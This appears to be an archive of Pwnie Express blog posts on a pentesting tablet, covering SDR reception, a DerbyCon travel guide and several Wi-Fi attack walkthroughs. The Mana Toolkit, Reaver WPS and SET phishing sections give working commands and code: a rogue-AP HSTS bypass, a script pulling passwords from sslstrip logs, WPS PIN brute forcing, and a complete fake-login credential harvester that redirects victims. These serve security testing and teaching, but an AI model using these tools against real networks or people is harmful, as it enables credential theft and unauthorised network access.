Posts

Introducing the Pwn Pad 4: the latest Pwnie mobile sensor for wired, wireless and Bluetooth device detection, classification, and penetration testing

We’re excited to announce pre-sale of the Pwn Pad 4, a commercial-grade security tablet designed for remote security assessment. The Pwn Pad 4 combines a portable security detection and pen-testing tool with a powerful enterprise security platform. The pentesting side also gains some exciting new features: with Kali Rolling and Blue Hydra (a Pwnie-developed capability), it’s the only pentesting tablet whose Bluetooth support covers detection and fingerprinting of both Bluetooth Low Energy and classic Bluetooth devices.

The Pwn Pad 4 features the following enhanced capabilities:

  • Blue Hydra: an industry first from Pwnie Express, the Pwn Pad 4 includes Blue Hydra, the first device discovery software capable of detecting both Bluetooth Low Energy and classic Bluetooth devices.
  • Portable Pen-Testing Doubling as Threat Detection Sensors: the tablet is fully integrated with Pwnie Express’ Pwn Pulse SaaS platform for real-time wired and wireless, BYOD and IoT threat detection. This lets security professionals combine the versatile pen testing capabilities of a portable pad with the centralized visibility and historical records of enterprise data.
  • Kali Linux Rolling Distribution: the tablet comes prepackaged with the latest Kali Rolling edition, which includes an arsenal of tools and scripts for the hands-on, on-the-go cyber security professional.
  • Enhanced Configuration and Setup: the Pwn Pad 4 is more user-friendly than its earlier counterparts, with a consumer-like setup and configuration wizard that streamlines the initial implementation, upgrading, and use of non-Pwnie Android apps.

The Pwn Pad 4 is now available for pre-sale and will be generally available on June 1.  For more information, please visit  or contact sales@pwnieexpress.com or call (855) 793-1337.

zANTI 2.0 on Pwnie Devices

Both the paid and community editions of the Pwn Pad and Pwn Plug currently include dSploit: an extremely comprehensive security suite that can map networks, scan for vulnerabilities, crack network passwords, and even launch sophisticated Man-In-The-Middle attacks, all from a slick and intuitive graphical user interface. Licensed as free and open source software under the GPLv3, it was a natural addition to the stock firmware on the Pwn Pad and Phone.

But if you’ve been trying to use dSploit on your Pwn device recently, you may have been in for a surprise. At the end of 2014, principal dSploit developer Simone Margaritelli announced he was officially merging his project with zANTI from Zimperium. Running dSploit now pops up a message about upgrading to zANTI 2.0, which is free of charge.

Upgrading to zANTI

When you try and start dSploit, it will immediately throw up a message about updating to the latest version. You can say no and continue to use the version of dSploit that came with the device (which will continue to work as normal), and even disable the update check if you don’t want to see this message anymore. If you continue to use dSploit, be aware that it will no longer be getting updates. While that isn’t a problem now, there is no telling what will happen in the future. In the absolute best case, it will be behind the curve, and in the worst, it may stop working in future versions of Android.


But let’s assume that you’re onboard with the change from dSploit to zANTI, and you tap “Yes”. This will begin the file download which you can check by pulling down the notification panel. Once the zANTI package has downloaded, you can install it just like any other side-loaded Android application.

It’s worth mentioning that installing zANTI won’t actually remove dSploit from your device, the two applications are completely separate and can both be installed at the same time.

Note: If you are having problems with the automatic update or would otherwise just jump right to zANTI, you can download the APK directly here.


Starting zANTI

The first time you start zANTI, you’ll see a prompt asking if you want to give it root-level permissions. Due to the advanced nature of the tools and techniques zANTI makes use of, there’s no way to use many of its features without agreeing by tapping “Grant”.

[Screenshot: SuperUser request dialog]

You’ll then be asked if you are a Community or Registered user. You don’t need to register to use the application, so you can simply stay on the “Community” tab, check the box next to “I accept Zimperium’s EULA”, and then tap “Start Now”. On the following screen you’ll be asked if you want to register, but you can simply touch “Skip” to continue.


There are a few hints and tips that zANTI gives you, along with a couple of screenshots you need to move through, and then finally you will be asked to confirm that you are authorized to perform penetration testing on the network.


Quick Overview

The main screen in zANTI is the network map, which begins populating with data as soon as you start the application. It shows the pertinent information about every host discovered on your network, such as IP address, MAC address, and open ports. Given enough time to complete its scan, zANTI will even list a best-guess device manufacturer and operating system for each entry. A full network scan can take a while, so be patient. There’ll be a sound and a notification when it’s complete, so you won’t miss it.


Selecting any one of the entries on this main list takes you to the page for that device. From here you can enter notes about the device, perform a deeper Nmap scan, and launch attacks against it.


Selecting one of these attacks, in this case Man-In-The-Middle, shows the wealth of options zANTI makes available to the operator. For MITM especially, there are some very impressive options, such as intercepting and replacing data in real time on its way to the targeted host.


cSploit

While it isn’t up to the standard zANTI has set, there is an active fork of dSploit known as cSploit that was broken off of the main project when the merge with Zimperium was announced. For those who may want to hold off on jumping on the zANTI bandwagon, cSploit is probably the best option short of continuing to use the unmaintained final version of dSploit.


Mobile SDR with Pwnie Mobile Devices

In the context of pentesting, “wireless” is generally taken to mean WiFi, and possibly Bluetooth. That’s not because those are the only two wireless technologies deployed in the wild, but because these are the primary types of wireless communications that testers can get access to. The economies of scale push the cost of high-end WiFi and Bluetooth radios down to the point that even amateur pentesters can afford them, but traditionally, the same has not been true for other forms of wireless.

But a chance discovery a few years ago revealed that cheap USB DVB-T tuners based on the Realtek RTL2832U chipset could be made to hand raw I/Q samples straight to the host, turning them into a wideband receiver covering far more of the spectrum than their advertised TV bands. With a bit of driver work, the hacking community got its hands on a highly capable software defined radio (SDR) that could be purchased for as little as $10 from some vendors.

With SDR, instead of having expensive radio equipment to receive and decode each specific wireless technology, one radio can be tuned into an arbitrary frequency, and software can do the decoding. This opens up a huge swath of the radio spectrum; everything from pager transmissions to satellite transmissions can be received with inexpensive hardware and open source software.

Even better, with powerful mobile devices like the Pwn Pad and Pwn Phone, it’s now possible to take SDR on the go. Penetration testing no longer has to be limited to WiFi and Bluetooth, but can include things such as two-way radio communications and pager messages.

Supported Hardware

TV tuners based on the RTL2832U chipset are fairly common, and a number of online retailers stock them specifically for SDR use. Searching eBay or Amazon for “RTL-SDR” will bring up plenty of hardware choices.

The RTL-SDR project website maintains a basic compatibility list of devices known to work, though it’s by no means exhaustive. A somewhat more detailed compatibility list, maintained by the community, is available on Reddit.

Software

Currently, the best SDR software available for Android is “SDR Touch”, developed by Martin Marinov. SDR Touch will work out of the box on both the Pwn Phone and Pwn Pad, all you need is the included USB On-The-Go (OTG) cable and a supported RTL device.

After your hardware is connected, open up SDR Touch and tap the On/Off button at the top right of the screen. That will show the following message, confirming you want to let SDR Touch communicate with the hardware. Selecting the checkbox will prevent you from seeing this dialog every time you start the app.

[Screenshot: USB device permission prompt]

Operation

SDR Touch is a full featured software defined radio, allowing you to tune the radio to whatever frequency you wish, visualize received signals with a “waterfall” spectrum analyzer, and even decode a number of protocols automatically.

Dragging the spectrum analyzer in the center allows you to adjust the frequency you’re currently listening to, and pinching will let you zoom in to make fine adjustments. Signals which are stronger than the background noise (which is to say, something that’s likely to be an interesting transmission) will show up as large spikes in the upper region of the display and colored tracks on the bottom of the display.

In the following image, the radio is tuned to 462.583 MHz, in the FRS/GMRS band used by consumer handheld radios, and is listening in on a transmission from a standard handheld walkie talkie.

[Screenshot: SDR Touch tuned to 462.583 MHz]

While SDR Touch is running you’ll be hearing live audio as it’s received from the radio hardware. When tuned to a transmission such as this, you’ll be able to hear whatever the users are saying as if you had your own walkie talkie. You can even press the “Record” button on the bottom right of the screen to save the audio.
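Here is what “software does the decoding” looks like for the simplest case, the narrowband FM voice you hear from a walkie talkie. This is an added example, not code from SDR Touch or the RTL-SDR project: it synthesises an I/Q stream in Python (a real capture would come from the dongle via rtl_sdr or a similar tool), runs a polar discriminator over it, and shows two things a practitioner looks for in the result: the audio tone comes out, and a mis-tuned receiver appears as a DC offset in the demodulated output, which is how you notice you are parked a few kHz off the carrier. The sample rate, test tone, deviation and tuning offset are constructed values.

```python
"""Narrowband FM demodulation in software, the step SDR Touch performs on
RTL-SDR samples. Constructed example: the I/Q stream is synthesised here
rather than captured from a dongle, so it runs offline."""
import cmath
import math

SAMPLE_RATE = 48_000  # Hz; constructed value, a typical audio-rate baseband


def make_nbfm_iq(tone_hz, deviation_hz, offset_hz, n, fs=SAMPLE_RATE):
    """Synthesise complex baseband I/Q for an NBFM carrier modulated by a
    single tone. offset_hz models a mis-tuned receiver: the carrier sits
    offset_hz away from where the SDR is tuned."""
    iq = []
    phase = 0.0
    for i in range(n):
        message = math.sin(2 * math.pi * tone_hz * i / fs)   # audio in [-1, 1]
        inst_freq = offset_hz + deviation_hz * message        # Hz
        phase = (phase + 2 * math.pi * inst_freq / fs) % (2 * math.pi)
        iq.append(cmath.exp(1j * phase))
    return iq


def fm_demodulate(iq, fs=SAMPLE_RATE):
    """Polar discriminator: the angle of s[n] * conj(s[n-1]) is the phase
    advance per sample, i.e. the instantaneous frequency. Returns Hz."""
    out = []
    for prev, cur in zip(iq, iq[1:]):
        out.append(cmath.phase(cur * prev.conjugate()) * fs / (2 * math.pi))
    return out


def tuning_offset(demod):
    """A receiver tuned slightly off the carrier sees the error as a DC term
    in the discriminator output; its mean is the tuning offset in Hz."""
    return sum(demod) / len(demod)


def peak_deviation(demod):
    """Largest swing away from the DC term: the transmitter's FM deviation."""
    dc = tuning_offset(demod)
    return max(abs(v - dc) for v in demod)


def dominant_tone_hz(demod, fs=SAMPLE_RATE):
    """Crude pitch estimate: count zero crossings of the DC-removed audio."""
    dc = tuning_offset(demod)
    audio = [v - dc for v in demod]
    crossings = sum(1 for a, b in zip(audio, audio[1:]) if (a < 0) != (b < 0))
    return crossings * fs / (2 * len(audio))


def demo():
    # FRS-style NBFM: 1 kHz test tone, +/-2.5 kHz deviation, receiver 4.5 kHz off.
    iq = make_nbfm_iq(tone_hz=1000, deviation_hz=2500, offset_hz=4500, n=SAMPLE_RATE)
    demod = fm_demodulate(iq)
    return {
        "offset_hz": tuning_offset(demod),
        "deviation_hz": peak_deviation(demod),
        "tone_hz": dominant_tone_hz(demod),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value:.1f}")
```

The DC term is the practical lesson: if the demodulated audio sits on a large constant offset, nudge the tuning until it centres, which is exactly the fine adjustment the pinch-to-zoom waterfall is for.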

Scratching the Surface

With the appropriate hardware and working knowledge of SDR Touch under your belt, a whole new world is opened up. Searching around the spectrum with an eye out for strong signals can uncover some very surprising things.

For example, in many areas pager networks are still operating in the 900 MHz band (in the US, POCSAG and FLEX traffic sits around 929-932 MHz). Pager broadcasts by their nature tend to be very strong, and are easy to identify by both the bright wide track they leave on the waterfall and their distinctive sound (not unlike an old analog modem). Connecting the Pwn Pad or Phone’s headphone jack to a computer’s audio input lets software such as multimon-ng decode digital signals like these; because the common paging protocols carry no encryption, the plaintext content of the pager messages can be recovered.

One simply can’t overstate just how much new territory is opened up by mastering SDR techniques. As we become increasingly reliant on wireless technology, having the tools and knowledge to discover and interpret wireless signals will become indispensable for the pentester.

Bypassing HSTS SSL with the Mana Toolkit

Anyone who’s attempted to use Moxie Marlinspike’s SSLstrip against recent browsers has no doubt run into HTTP Strict Transport Security (HSTS), a response header with which a site tells the browser to reach it only over HTTPS for a set period (and, optionally, all of its subdomains too). This closes the gap SSLstrip relied on: previously the browser had no way of knowing ahead of time that a site was supposed to be encrypted, so a link downgraded to plain HTTP looked perfectly normal.

When a user running a recent version of Chrome or Firefox visits an SSL secured site which has been forced down to plain HTTP with SSLstrip, it not only fails, but goes as far as informing the user their current Internet connection is potentially being tampered with by a third party.

But thanks to the recently released “Mana Toolkit” from SensePost, the SSLstrip technique is once again viable against modern operating systems and browsers. Mana bundles an updated SSLstrip (sslstrip2, which rewrites links to slightly altered hostnames the browser holds no HSTS entry for) with a matching DNS proxy (dns2proxy) that resolves those altered names back to the real servers, plus a turn-key rogue AP, making it an extremely effective solution for covertly capturing WiFi traffic. One caveat to keep in mind: hostnames covered by a browser’s built-in HSTS preload list with includeSubDomains set remain protected, since the altered name still falls under the policy.

Running Mana

Mana has recently been added to the Kali Linux repositories, which means that on Pwnie devices running Pwnix it can be installed by simply running:

apt-get install mana-toolkit

This will pull in quite a few dependencies required to get Mana running, and will drop you back to the command line once finished.

From there, navigate to the Mana directory located at /usr/share/mana-toolkit, and then enter the directory named run-mana. Here you’ll find a number of scripts used to control how Mana operates.


Of the available scripts, the following will be the most useful under normal circumstances:

start-nat-full.sh

Starts the rogue AP, routes client traffic out to the Ethernet network, and enables all of the tools included in Mana. This is the script you want to get Mana working as quickly as possible.

start-nat-simple.sh

Starts the rogue AP, but none of the tools. Use this script if you want to deploy your own tools against targets.

start-noupstream.sh

Starts the rogue AP without an upstream Internet connection, complete with a fake captive portal login page for capturing victim credentials even when you’re offline.

The most common usage will be to run the full Mana suite, so we’ll look at that. While you can manually edit the configuration files under /etc/mana-toolkit, it isn’t necessary to get Mana up and running. Running the “start-nat-full.sh” script will launch Mana and start flooding the terminal with status info:

[Screenshot: start-nat-full.sh status output]

Mana will now be advertising a wireless network named “Internet”, and it will also answer probe requests from clients looking for networks they have joined before, impersonating those SSIDs (the KARMA technique) so that devices connect on their own.

Compatible Sites

Mana includes the necessary configuration files to capture credentials on a number of popular sites, but of course not all are currently supported. Browsing the source via their official GitHub page shows Mana is already setup to capture login credentials from Facebook, Google, and Apple:

https://github.com/sensepost/mana/tree/master/apache/etc/apache2/sites-available

As Mana is still in development, additional sites and services are still being added. In the meantime, the developers suggest using the already available code as a template to customize your Mana installation for your specific needs and targets.


Reviewing Captured Data

The main Mana script dumps out a rather overwhelming amount of continually updating information, and it can be very difficult to interpret it as everything goes by. It’s therefore easier to manually check the SSLstrip logs to look for captured credentials than trying to read them from the script’s output.

The main SSLstrip log file is located at /var/lib/mana-toolkit/sslstrip.log and holds the previously SSL-protected data Mana managed to capture. Searching it for usernames and passwords (try grep -i pass, then read the POST bodies that follow each host line) can uncover some extremely interesting information.
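Rather than eyeballing grep output, the following script pulls POST bodies out of the log and flags the fields that look like credentials. It is an added example, not part of Mana or SSLstrip, and it assumes the entry layout SSLstrip’s logger writes (a timestamped “POST Data (host):” line followed by the URL-encoded request body); the hosts and submissions in SAMPLE_LOG are constructed, not captured traffic. Check the first few lines of your own log and adjust POST_HEADER if the format differs.

```python
"""Pull likely credentials out of an sslstrip log. Added example, not part of
the Mana toolkit. Assumes the entry layout sslstrip writes: a timestamped
'POST Data (<host>):' line followed by the URL-encoded body on the next
line(s). Check your own log and adjust POST_HEADER if it differs."""
import re
from urllib.parse import parse_qs

# Header line as written by sslstrip's logger (assumption: '%(asctime)s %(message)s').
POST_HEADER = re.compile(r"^(?P<ts>\S+ \S+) (?:SECURE )?POST Data \((?P<host>[^)]+)\):\s*$")

# Field names worth flagging. Extend for the sites you are authorised to test.
SECRET_KEYS = re.compile(r"pass|pwd|secret|token|session", re.I)
IDENTITY_KEYS = re.compile(r"user|login|email|name|identifier", re.I)

# Constructed sample log (not real traffic): two login-shaped POSTs and one noise entry.
SAMPLE_LOG = """\
2015-02-18 14:03:12,345 POST Data (www.example-social.test):
email=alice%40example.test&pass=correct+horse&locale=en_US&lsd=AVqBx
2015-02-18 14:03:40,101 POST Data (tracker.example-ads.test):
ev=pageview&id=987654
2015-02-18 14:05:02,777 SECURE POST Data (accounts.example-mail.test):
Email=bob%40example.test&Passwd=hunter2&persistent=yes
"""


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}


def parse_sslstrip_log(text):
    """Return a list of (timestamp, host, fields) for each POST entry in the log."""
    entries = []
    current = None      # (timestamp, host) of the entry being read
    body_lines = []
    for line in text.splitlines():
        m = POST_HEADER.match(line)
        if m:
            if current:
                entries.append((*current, parse_body("\n".join(body_lines))))
            current = (m.group("ts"), m.group("host"))
            body_lines = []
        elif current is not None:
            body_lines.append(line)   # body may span several lines
    if current:
        entries.append((*current, parse_body("\n".join(body_lines))))
    return entries


def find_credentials(entries):
    """Keep entries carrying at least one secret-looking field, paired with
    whatever identity-looking fields travelled with it."""
    hits = []
    for ts, host, fields in entries:
        secrets = {k: v for k, v in fields.items() if SECRET_KEYS.search(k)}
        if not secrets:
            continue
        identities = {k: v for k, v in fields.items()
                      if IDENTITY_KEYS.search(k) and k not in secrets}
        hits.append({"time": ts, "host": host, "identity": identities, "secret": secrets})
    return hits


if __name__ == "__main__":
    import sys
    # Pass the real path (/var/lib/mana-toolkit/sslstrip.log) to run it on a capture.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in find_credentials(parse_sslstrip_log(text)):
        print(f"{hit['time']} {hit['host']}: {hit['identity']} -> {hit['secret']}")
```

Run it as `python3 sslstrip_creds.py /var/lib/mana-toolkit/sslstrip.log`; the field-name patterns are deliberately loose, so expect to tune them once you see which forms your targets actually post.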




WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.


WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). It is meant as a convenience: in push-button mode the user presses a button on the access point and on the client device (the client side “button” is often in software) at roughly the same time, the devices trade the network settings, and a WPA link is set up. The same exchange also exists in a PIN mode, where it is authenticated with an eight-digit PIN printed on the access point instead of a button press.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as the push-button method requires physical access to the hardware, it would seem relatively secure.

But the PIN method is available over the air at any time, and a tool called Reaver has been designed to brute-force it: it poses as a registrar and tries PINs against the access point until one is accepted, at which point the access point hands over the WPA passphrase. No button on the access point ever needs to be pressed.

While some newer devices build in protection against this specific attack (rate limiting, or locking WPS after a run of failed PIN attempts), the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which it should, given the existence of tools such as this), it will be immune to the following attack.


Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to put the wireless hardware into monitor mode:

airmon-ng start wlan0

From here you could use airodump-ng to look for networks, but the Reaver package includes its own tool, wash, for finding WPS-enabled access points, which is much more straightforward. To start it, run the following command:

wash -i mon0

The output will look something like this:

[Screenshot: wash output listing two WPS-enabled networks]

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column: an access point reports itself as locked when it has stopped accepting PIN attempts, usually after a run of failures. This is far from a definitive indicator, but in general you’ll find that APs listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt an attack against a network which is WPS locked, but the chances of success aren’t very good.

Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, the channel, and the BSSID (the access point’s MAC address, not its ESSID) to be specified. The command to launch Reaver against the “linksys” network above would look like this:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output, which greatly helps when trying to gauge how well Reaver is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:

[Screenshot: Reaver verbose output]

This output shows that WPS PINs are successfully being tried against the target (here we see 12345670 and 00005678 being tested; the last digit of each is a checksum of the first seven), and Reaver is operating normally.

Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15

The core command hasn’t changed, the additional switches just change how Reaver behaves:

-L    Ignore the AP’s locked WPS state and keep trying.

-N    Don’t send NACK packets when errors are detected.

-d 15    Delay 15 seconds between PIN attempts.

-T .5    Set the receive timeout period to half a second.

-r 3:15    After every 3 attempts, sleep for 15 seconds.

This is by no means an exhaustive list of Reaver options, but it gives an idea on what kind of things you might want to try.


Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. The search space is smaller than eight digits suggest, because the access point confirms the first four digits separately from the next three and the eighth digit is a checksum, so at most about 11,000 PINs need to be tried rather than 100 million. There is still an element of chance involved; the brute forcing could theoretically discover the PIN very quickly, but with each attempt taking seconds (more with the delays above) it is generally going to take many hours to make a dent in the pool of possible PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN and through that the WPA passphrase…eventually.
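The reason the attack is feasible at all is worth seeing in code. The following is an added example, not Reaver’s source: in the WPS registrar exchange the access point’s reply to message M4 reveals whether the first four PIN digits were right, its reply to M6 reveals the next three, and the eighth digit is a checksum, so the access point acts as an oracle over two small halves. The WpsOracle class is a constructed stand-in for those responses; Reaver drives a real access point over EAP/WSC frames instead, which is where the hours go.

```python
"""Why a WPS PIN falls to brute force. Added example, not Reaver's code.
The registrar protocol proves the PIN in two halves (the AP NACKs after M4
if the first four digits are wrong, and after M6 if the next three are),
and the eighth digit is a checksum of the other seven."""


def wps_checksum(first7):
    """Checksum digit over the first seven digits (odd positions weighted 3)."""
    accum = 0
    for i, ch in enumerate(first7):
        accum += (3 if i % 2 == 0 else 1) * int(ch)
    return (10 - accum % 10) % 10


def is_valid_pin(pin):
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class WpsOracle:
    """Constructed stand-in for the access point's observable answers: a real
    AP replies with M5 (first half right) or NACK after M4, and with M7 or
    NACK after M6. Only the secret PIN is hidden, as it is over the air."""

    def __init__(self, secret_pin):
        assert is_valid_pin(secret_pin)
        self.secret = secret_pin
        self.attempts = 0

    def first_half_ok(self, p1):
        """Outcome of the M4 exchange for a candidate first half."""
        self.attempts += 1
        return p1 == self.secret[:4]

    def second_half_ok(self, p1, p2):
        """Outcome of the M6 exchange for a candidate second half."""
        self.attempts += 1
        return p1 + p2 == self.secret[:7]


def crack_pin(oracle):
    """Search 10^4 first halves, then 10^3 second halves: at most 11,000
    exchanges, against the 10^7 valid PINs an all-at-once check would need."""
    first = None
    for i in range(10_000):
        candidate = f"{i:04d}"
        if oracle.first_half_ok(candidate):
            first = candidate
            break
    for i in range(1_000):
        candidate = f"{i:03d}"
        if oracle.second_half_ok(first, candidate):
            return first + candidate + str(wps_checksum(first + candidate))
    raise RuntimeError("AP never accepted a PIN (locked, or not a WPS PIN registrar?)")


if __name__ == "__main__":
    ap = WpsOracle("98765430")    # constructed target PIN
    print(crack_pin(ap), "after", ap.attempts, "exchanges")
```

The checksum routine also explains the PINs in the screenshot above: 1234567 and 0000567 check out to 0 and 8 respectively, which is why Reaver tries 12345670 and 00005678 rather than any other final digit.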



Derby Con 4.0 – Guide to Louisville

Derby Con 4.0 will be September 24-28 in Louisville Kentucky, and Pwnie Express will be on hand September 25-26 (and we might have stickers), so stop by the booth and say hello! We’ll be having a drawing for a free red Pwn Phone, one of only a few specially-made ones. In order to enter the drawing, stop by the booth and drop a business card.


In addition, two of the Pwnies will be leading a workshop called “Make Your Own Pwn Phone”  on Friday, Sept. 26 from 2:00pm – 4:00pm where you can, well, make your own Pwn Phone.  We will not, however, be providing phones — so remember to bring your own Nexus 5 or Nexus tablet if you want to participate. In addition, we will be selling the “Pwn Pad DIY kit” and the “Pwn Pro DIY kit;” full kits with all the adapters, case, velcro, etc. at the booth.

Though Derby Con is the reason to go, Louisville is also a great place to explore: in addition to the amazing food and the Kentucky Derby, Louisville is the home of Bourbon and some pretty great bars. Aside from the “standard” touristy sites, check out Louisville’s Mini Maker Faire on Saturday, September 27th and the local hackerspace LVL 1.

Start your tour of Louisville with the standard touristy sites on Main Street and Museum Row: for all you boxing fans, there’s the Muhammad Ali Center, a museum dedicated to the life and vision of Muhammad Ali. Those who prefer baseball can check out the Louisville Slugger Museum, a museum dedicated to the “Louisville Slugger” baseball bat and baseball history in general. Though Slugger Field might not have games this time of year, the field’s gastropub Against the Grain is always open, with a great selection of craft brew and (word has it) some of the best beer cheese around. The 21C, a hotel voted #1 Hotel in the South, is also on the row and has an incredible contemporary art museum.

If music and food are more your style, Fourth Street Live is a great destination for restaurants, bars, lounges, and a food court with some of the best BBQ in the nation. For those willing to go a bit off the beaten path, Bardstown Road is a quirky, offbeat foil to the more touristy Fourth Street Live. Bardstown Road includes the Phoenix Hill Tavern, the oldest nightclub in the city, and comedy club Comedy Caravan (featuring the Laughing Derby).

Of course, Churchill Downs, home of the Kentucky Derby, will be hosting races during the weekend of Derby Con. Check out their calendar of events to find races and other happenings. More of historical Louisville can be found at the Seelbach Hilton, a hotel featured in Fitzgerald’s Great Gatsby and one of the places where he wrote the book. Old Louisville has the country’s largest collection of Victorian architecture, and the Bourbon Trail is a historical icon of a slightly different sort.

Hope to see you soon!

Stealing Credentials with Fake Login Pages

In previous entries, we’ve seen how client devices can be tricked into connecting to a rogue access point, giving the person running the AP full control over the client’s Internet access. The concept is fairly simple: present the client device with a WiFi network that looks like what it is expecting and the device will connect without a fuss.

As it turns out, humans can be tricked just as easily. As a general rule, people are trusting; as long as things look more or less as they expect them to, most users will continue on with their normal routine, blissfully unaware that they might be the victim of a sophisticated attack.

In this post, we’ll build on the EvilAP attack by presenting victims a cloned version of the Facebook login page in an effort to capture their login credentials. Facebook is used only as an example here, the same method can be used with any website that features a login dialog.

Note: The following assumes you’ve already configured an EvilAP and are ready for clients to connect. If you’d like to read up on how to launch an EvilAP, take a look at “EvilAP: A Practical Example”.

Social Engineering Toolkit

The Social Engineering Toolkit (SET) is a collection of tools designed to automate a wide array of exploits: everything from generating malicious QR codes to programming a microcontroller to act as an attack vector. In this particular example, we’ll be using the “Site Cloner” function, which will duplicate any website the operator chooses and capture information the victim sends to it.

To launch SET, tap its icon under the “Attack Tools” directory.


SET has its own menu system which you can navigate through by entering the numbers corresponding to the selection you wish to make.

[Screenshot: SET main menu]

First, select “Social-Engineering Attacks” by entering in the number 1, then number 2 for “Website Attack Vectors”.


Then enter 3 for “Credential Harvester Attack Method”, and finally, enter 2 for “Site Cloner”. You’ll then be asked for the IP address the harvester should listen on, which is the EvilAP’s own address, 192.168.7.1 (the cloned page’s login form will post back to it), followed by the URL of the site you want to clone.


All that’s left to do now is wait for the results to scroll across the screen. As victims connect to the EvilAP and try to log in to Facebook (or whatever site you selected to clone), their login credentials will show up in red, and SET then redirects the victim on to the real site so that nothing looks out of the ordinary on their end.

[Screenshot: captured credentials in SET output]
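What Site Cloner sets up behind those menu choices is a small web server: it serves a copy of the login page whose form posts back to the harvester, records whatever is submitted, and bounces the victim to the real site. The following is an added example, not SET’s code, showing that mechanism with a constructed stand-in page; REAL_SITE, the form fields and the 127.0.0.1 demo address are all assumptions. A real clone would serve the target’s own HTML with the form action rewritten, bound to the EvilAP’s address on port 80.

```python
"""Minimal credential harvester of the kind SET's Site Cloner generates:
serve a look-alike login form over plain HTTP, record the POSTed fields,
then redirect the victim to the real site so nothing looks wrong.
Added example, not SET's code; hostnames, form and addresses are constructed."""
import http.client
import threading
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://login.example-social.test/"   # assumption: where victims get bounced
CAPTURED = []                                        # (client_ip, {field: value})

# Constructed look-alike page. Site Cloner would use the target's real HTML with
# the form action rewritten to point at this server instead.
LOGIN_PAGE = b"""<html><body><h1>Log in</h1>
<form method="post" action="/login">
Email <input name="email"><br>
Password <input name="pass" type="password"><br>
<input type="submit" value="Log In"></form></body></html>"""


def harvest_post(body):
    """Decode an x-www-form-urlencoded body into {field: value} and pick the
    redirect target. Kept separate so the capture logic is testable without
    a socket."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return fields, REAL_SITE


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any path gets the fake login page, mirroring a cloned site root.
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(LOGIN_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields, redirect_to = harvest_post(self.rfile.read(length).decode(errors="replace"))
        CAPTURED.append((self.client_address[0], fields))   # SET prints these in red
        self.send_response(HTTPStatus.FOUND)                 # 302: hand the victim to the real site
        self.send_header("Location", redirect_to)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet; the capture list is the record


def serve(bind="127.0.0.1", port=0):
    """Start the harvester in a background thread; port 0 picks a free port.
    On an EvilAP you would bind the AP address (192.168.7.1) on port 80."""
    srv = ThreadingHTTPServer((bind, port), Harvester)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    """Loopback demonstration: post a constructed login to our own harvester."""
    srv = serve()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", srv.server_address[1], timeout=5)
        conn.request("POST", "/login", body="email=victim%40example.test&pass=s3cret",
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        status, location = resp.status, resp.getheader("Location")
        conn.close()
    finally:
        srv.shutdown()
        srv.server_close()
    return status, location, CAPTURED[-1][1]


if __name__ == "__main__":
    print(run_demo())
```

The plain-HTTP listener is the whole trick: a client on the EvilAP reaches the harvester before any HTTPS negotiation happens, and the 302 to the real site is what keeps the victim from noticing that their first login attempt went nowhere.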

How to Use WiFite on the Pwn Pad

